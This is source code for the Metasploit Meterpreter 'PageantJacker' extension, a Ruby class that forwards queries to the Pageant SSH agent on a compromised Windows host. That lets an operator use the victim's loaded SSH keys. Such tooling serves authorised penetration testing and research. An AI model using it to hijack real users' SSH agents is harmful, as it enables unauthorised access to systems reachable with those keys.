Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# -*- coding: binary -*-
2

3
module Rex
4
module Post
5
module Meterpreter
6
module Extensions
7
module Extapi
8
module Pageant
9

10
###
11
# PageantJacker extension - Hijack and interact with Pageant
12
#
13
# Stuart Morgan <[email protected]>
14
#
15
###
16
class Pageant
17
  def initialize(client)
18
    @client = client
19
  end
20

21
  def forward(blob, size)
22
    return nil unless size > 0 && blob.size > 0
23

24
    packet_request = Packet.create_request(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY)
25
    packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size)
26
    packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob)
27

28
    response = client.send_request(packet_request)
29
    return nil unless response
30

31
    {
32
      success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS),
33
      blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB),
34
      error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE)
35
    }
36
  end
37

38
  attr_accessor :client
39
end
40

41
end
42
end
43
end
44
end
45
end
46
end
47

48